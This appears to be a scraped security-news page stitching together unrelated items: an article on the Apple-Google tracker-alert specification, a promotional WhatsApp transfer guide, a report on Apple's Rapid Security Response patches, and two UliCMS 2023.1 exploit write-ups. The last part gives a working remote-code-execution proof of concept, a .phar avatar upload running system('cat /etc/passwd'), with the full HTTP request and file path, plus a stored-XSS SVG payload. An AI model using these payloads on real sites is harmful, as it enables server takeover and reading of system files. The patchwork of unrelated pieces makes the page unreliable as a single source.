Google and Apple have announced that they are looking for input from industry participants and advocacy groups on a draft specification to alert users in the event of suspected unwanted tracking. Samsung, Tile, Chipolo, eufy Security, and Pebblebee have stated that they will support the specification in future products.

The specification will consist of a set of best practices and protocols for accessory manufacturers whose products have built-in location-tracking capabilities. Examples of these accessories are the Apple AirTag, Tile Mate and Pro, Samsung SmartTag, and Google’s expected Grogu.

The basic principle of these tags is that anyone with the matching app and permissions on their device (usually a phone) contributes to find the last location where the tag was detected. The idea is that you attach a tag to the objects you are afraid of misplacing or losing, such as your keys or your laptop, or even you car, and when you need to find the object you can look in the app and see where it last made contact with a device. This type of contact is usually made over Bluetooth.

After several complaints and reports that these tracking devices were used to track people rather then finding lost objects, some states introduced bills to ban the use of trackers to aid stalking. But a bill doesn’t stop those that had criminal intentions anyway. Nor do these bills stop the car thieves that planted AirTags on expensive cars, so they could find the cars at home where they were less well protected.

Apple and Google's specification aims to set a standard for apps that can detect and warn users about Bluetooth-trackers, and if needed tell the user how to disable them. The alliance between the two tech giants ensures that this can be done from Android phones and iPhones. Earlier, Apple introduced an app called “Tracker Detect” which made it possible to look for item trackers that are separated from their owner and that are compatible with Apple’s Find My network. The proposed specification would allow users to find Bluetooth trackers of various vendors in pretty much the same way.

The draft for the “Datatracker” specification says that the goal is to help protect the privacy of individuals from unwanted tracking by location-tracking accessories.

> “Location-tracking accessories provide numerous benefits to consumers, but, as with all technology, it is possible for them to be misused. Misuse of location-tracking accessories can result in unwanted tracking of individuals or items for nefarious purposes such as stalking, harassment, and theft.  Formalizing a set of best practices for manufacturers will allow for scalable compatibility with unwanted tracking detection technologies on various smartphone platforms and improve privacy and security for individuals.”

The best practices outlined in the specification are aimed at location-enabled accessories that are small, not easily discoverable, and use Bluetooth Low Energy (LE) as the transport protocol. Interested parties are invited and encouraged to review and comment over the next three months. Following the comment period, Google and Apple will partner to address feedback and will release a production implementation of the specification for unwanted tracking alerts by the end of 2023 that will then be supported in future versions of Android and iOS.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google and Apple cooperate to address unwanted tracking 

By ghostadmin
When you transfer data from an Android to an iOS device, the Move to an iOS app is…
This is a post from HackRead.com Read the original post: Transferring WhatsApp Data Between Android and iPhone [2023]

When you transfer data from an Android to an iOS device, the Move to an iOS app is the go-to solution for any mobile user. However, many users have complained that this app doesn’t work at the final step when importing backup. Or some data is not completely transferred. So is there an alternative to the Move to iOS app that is safe, secure, and capable of doing the job?

IToolab WatsGo fits the description of a worthy solution pretty well. We have discussed its features and working, too. 

So stay tuned as this article explains the two best and proven methods to transfer WhatsApp from Android to iPhone simply and seamlessly. Be in for a thoughtful read ahead. 

****2 efficient Methods to Transfer WhatsApp between Android and iPhone****

Multiple ways are there to transfer WhatsApp from Android to iPhone**.** Here we have discussed the two practical ways, Move to iOS and iToolab WatsGo, to help you transfer data from Android to iPhone in minutes.

****Method 1: Use iToolab WatsGo to Transfer WhatsApp from Android to iPhone without factory resetting your iPhone****

iToolab WatsGo – WhatsApp Transfer, Backup & Restore is the best-proven solution to quickly transfer WhatsApp from Android to iPhone and other iOS devices with just one click. Besides messages, you can export and migrate multiple data types like audio, videos, images, contacts, label messages, etc., without hassle. 

The program easily transfers GBWhatsApp to WhatsApp/GBWhatsApp and even backups and restores GBWhatsApp, and is compatible with all iOS, including iPhone 16, Android devices, including 12/13, and over 6000 Android models. 

****Prime Features of iToolab WatsGo****

*   **1\. Features multidirectional transfer:** iToolab features multidirectional transfers from Android to iPhone, iPhone to Android, Android to Android, and iPhone to iPhone.
*   **2\. Does not require iPhone factory reset:** With iToolab WatsGo, you don’t need to factory reset your iPhone; instead, its cutting-edge inbuilt tech has a high success rate of up to 90%.
*   **3\. Fast Transfer Speed:** Compared to any program, iToolab WatsGo has a 3x faster transfer speed. Instead, it has a powerful transfer speed of 10240 kb/s compared to Move to iOS. 
*   **4\. Smooth Transfer:** This program transfers extensive data of up to 20GB without sudden Interruption and exports 40k messages simultaneously.
*   **5\. Supports 6000+ Android devices:** iToolab supports over 6k Android models, including Huawei, OnePlus, and Xiaomi.
*   **6\. Supports transferring over 20 data types:** The program transfers images, audio, videos, call history, contacts, docs, links, stickers, status, messages, wallpaper, etc.
*   **7\. High compatibility:** iToolab WatsGo is fully compatible with the latest iPhone 14 series, iOS 16, and Android 13.

****Steps to Use iToolab WatsGo****

**Step 1: Download and open iToolab WatsGo**

Download and install iToolab WatsGo from its official link and click WhatsApp in the left panel. Then click **WhatsApp Transfer.** 

Remember to enable USB debugging on Android and tap **Trust** on iPhone so iToolab WatsGo recognizes them easily.  

**Step 2: Connect your Android and iPhone** 

Connect your Android (source device) and iPhone (target device) with the PC. Then click the arrow to flip both devices and adjust them. 

Once the connection is established, the tool reminds you that your iPhone will be overwritten, so you must back it up in case of losing your essential data. 

You must select the WhatsApp data and media files to be transferred to the iPhone, but text messages are shared by default. 

**Step 3: Turn on end-to-end encrypted WhatsApp Backup** 

Enable end-to-end encrypted WhatsApp Backup on your Android phone and follow the prompts (on-screen instructions) to backup. Or simply click the Kebab menu (three vertical dots) at the upper right > **Settings** \> **Chats** \> **Chat Backup.** Ensure to take a screenshot to save the password.

**Step 4: Verify with Password** 

Once the WhatsApp backup is generated, verify the 64-bit encrypted backup with a password. If you cannot verify the encrypted backup, click **Phone Number Verification** under the **Verify** button and continue the transfer process. 

*   Backup WhatsApp manually and turn off the encrypted backup
*   Verify the phone number (earlier used for backup)

**Step 5: Generate WhatsApp backup to restore**

Now the Android WhatsApp backup will process and convert to the format applicable to iPhone and will begin to restore to your iPhone. Within a few moments, you’ll see the success interface indicating that WhatsApp has transferred to the iPhone completely, and your iPhone will reboot again. 

**Pros** 

*   Does not compromise on data
*   Transfers data in a few clicks
*   Offers multidirectional and secure support
*   It doesn’t require jailbreak 
*   Compatible with Android 13 and iOS 16

**Cons**

*   The Mac version is unavailable 

****Other Useful Features of iToolab WatsGo****

Besides offering the ease of transferring WhatsApp from Android to iPhone**,** iToolab WatsGo delivers its services through many other valuable features.  

*   1\. iToolab WatsGo easily restores WhatsApp backup from Google Drive to iPhone.
*   2\. The program transfers GBWhatsApp to WhatsApp or GBWhatsApp/ WhatsApp Business in a simple way.
*   3\. iToolab lets you preview and restore WhatsApp or iTunes backup anytime you want.
*   4\. All the backups from the history list are displayed in the program. 
*   5\. iToolab WatsGo lets you back up WhatsApp on iOS and Android to a computer without iTunes, Google Drive, or iCloud. 

****Method 2: Use Move to iOS to Transfer WhatsApp from Android to iPhone** **

Move to iOS is an efficient tool from Apple that lets you quickly transfer multiple data, viz., message history, contacts, mail accounts, website bookmarks, photos, videos, and calendars, to iOS devices. The app comes in handy for a new iOS user. 

**Step 1:** Turn on your new/factory reset iPhone and keep it near the Android phone. Follow the setup instructions on the iPhone. 

**Step 2:** Look for the **Apps & Data** screen and click **Move Data from Android.** 

**Note:** You must erase your iOS device and start over if you have already finished setting up. But if you don’t want to erase it, you can transfer your WhatsApp data manually. 

**Step 3:** Launch and open the Move to iOS app on your Android device, then follow the instructions prompts on the screen. 

**Step 4:** Click **Continue** on your iPhone when you see the **Move from Android** screen. Then a six-digit/ten-digit code will display on your iPhone. Enter the prompt code on your Android phone.

**Step 5:** Your iPhone will create a temporary WiFi network. Click **Connect** to join it on your Android phone when asked, and wait for the **Transfer Data Screen** to appear. 

**Step 6:** Select your content on Android to transfer and click **Continue.**

**Step 7:** Keep both phones nearby and plug them into a power source until the data transfer is completed. The transfer time depends on your chosen content.

**Step 8:** Once the loading bar finishes on your iPhone, click **Done** on Android. Click **Continue** on your iPhone and follow the screen prompts to set it up. 

**Step 9:** Ensure all your selected WhatsApp content is transferred. You can manually move music, books, and PDF files. 

**Pros**

*   Transfers all your account information from Android to iOS devices over WiFi
*   Perfect solution for beginners 
*   Identifies Android apps and downloads on iPhone (if they are free)

**Cons**

*   Your iPhone must be new or factory reset.
*   Connect your Android and iPhones to the same WiFi and a power source. 
*   Ensure to use the same mobile number on both devices. 
*   You must have Android 5 or above, iOS 15.5, and newer versions to use the Move to iOS app.
*   Ensure installing Whatsapp iOS version 2.22.10.70 or above on iPhone and WhatsApp Android version 2.22.7.74 for Android phones. 

****The Bottom Line** **

As a new iOS user, transferring WhatsApp to your iOS device can be challenging, especially if you don’t follow the apt solutions. But we have discussed the two efficient and practical methods to transfer WhatsApp from Android to iPhone simply.

While Move to iOS is an excellent method, its cons are enough to seek an excellent alternative. So you can try iToolab WatsGo WhatsApp Transfer to transfer, back, and restore your WhatsApp data cleanly and simply.

1.  How to Transfer Data from Android to iPhone
2.  How to Create and Manage Groups on iPhone
3.  Transferring data between smartphones seamlessly
4.  How to Transfer Dropbox to Google Drive Fast & Easy
5.  How to Transfer Data between iPhone & Computer Safely

Transferring WhatsApp Data Between Android and iPhone [2023]

Categories: Apple
Categories: News
Tags: macOS

Tags:  iOS

Tags:  iPadOS

Tags:  Rapid Security Response

Tags:  RSR

After announcing Rapid Security Response (RSR) last year, Apple has finally released the first RSR patches to the public.



(Read more...)




The post Apple releases first Rapid Security Response update for iOS, iPadOS, and macOS users appeared first on Malwarebytes Labs.

On Monday, Apple released its first batch of Rapid Security Response (RSR) patches, **iOS 16.4.1 (a)**, **iPadOS 16.4.1 (a)**, and **macOS 13.3.1 (a)**, for iPhone and iPad, and macOS devices, respectively.

RSR is a new type of software patch delivered between Apple's regular, scheduled software updates. Previously, Apple security fixes came bundled along with features and improvements, but RSRs only carry security fixes. They're meant to make the deployment of security improvements faster and more frequent. According to an Apple notice about RSRs, the new updates "may also be used to mitigate some security issues more quickly, such as issues that might have been exploited or reported to exist 'in the wild'."

Think of it as the company's version of Microsoft's out-of-band (OOB) patches.

"When a Rapid Security Response has been applied, a letter appears after the software version number, as in this example: macOS 13.3.1 (a)," the notice said, giving users a glimpse of how RSR versioning works.

Apple introduced Rapid Security Response updates with the launch of iOS 16, iPadOS 16, and macOS Ventura at its Worldwide Developers Conference last summer. Devices allow automatic RSR patching by default, but the company provided its users with the option to disable it. You can visit this Apple Support page to learn how you can do this on iPhone, iPad, and Mac.

If you _do_ disable RSR, you will still receive security fixes as part of Apple's regular software updates, just as you did previously. However, not getting a quick fix when it's available could leave your device vulnerable to in-the-wild exploits.

Apple began testing RSR last year, with its beta testers. Monday's patches were the first to be released to the public. Some users reported they couldn't install the updates, even when devices successfully downloaded the patches, but that problem seems to have been resovled now, according to The Verge.

The company also didn't make clear what security fixes RSR for iOS, iPadOS, and macOS addressed, since there were no notes released for them. Moving forward, Apple will only make RSR available to all devices running the latest version of iOS, iPadOS, and macOS.

RSRs aren't the only recent innovation that should make it harder for criminals to exploit Apple devices. On April 21, we reported on Citizen Lab's investigation into the effectiveness of Apple's Lockdown Mode, a feature designed to provide a safer environment for users at a higher risk from targeted attacks, such as those developed by NSO Group, the company behind the notorious spyware Pegasus, and QuaDream. NSO Group is known to take advantage of 0-day vulnerabilities. RSRs should improve protection further by allowing Apple to patch those 0-days immediately after they're discovered.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Apple releases first Rapid Security Response update for iOS, iPadOS, and macOS users

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

Tag

#apple